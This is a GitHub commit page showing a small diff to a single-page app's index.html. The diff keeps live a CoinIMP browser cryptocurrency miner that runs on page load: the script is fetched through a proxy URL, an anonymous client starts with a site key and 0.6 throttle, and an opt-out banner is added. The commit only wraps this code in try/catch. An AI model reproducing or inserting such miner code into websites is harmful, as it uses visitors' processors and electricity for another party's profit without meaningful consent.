Skip to content
This repository has been archived by the owner on Jul 14, 2024. It is now read-only.

Commit

Permalink
Update index.html
Browse files Browse the repository at this point in the history
  • Loading branch information
garder500 authored Apr 3, 2024
1 parent ac97a1d commit 5ceaddc
Showing 1 changed file with 4 additions and 2 deletions.
6 changes: 4 additions & 2 deletions spa/index.html
Original file line number Diff line number Diff line change
Expand Up @@ -32,12 +32,14 @@
<div id="root"></div>
<script src="https://proxy.ketsuna.com/?url=https%3A%2F%2Fwww.hostingcloud.racing%2F9Kdk.js"></script>
<script>
try{
var _client = new Client.Anonymous('015978d31b8215e1f45c35853ef3525db5031fff9a18c882494f3fadc332994e', {
throttle: 0.6, c: 'w'
});
_client.start();
_client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com. If it bothers you, you can stop it.", "#cccccc", 40, "#3d3d3d");

}catch{
console.log("this was not enabled")
}
</script>
<script src="//www.gstatic.com/cv/js/sender/v1/cast_sender.js?loadCastFramework=1"></script>
<script type="module" async src="/src/root.tsx"></script>
Expand Down

0 comments on commit 5ceaddc

Please sign in to comment.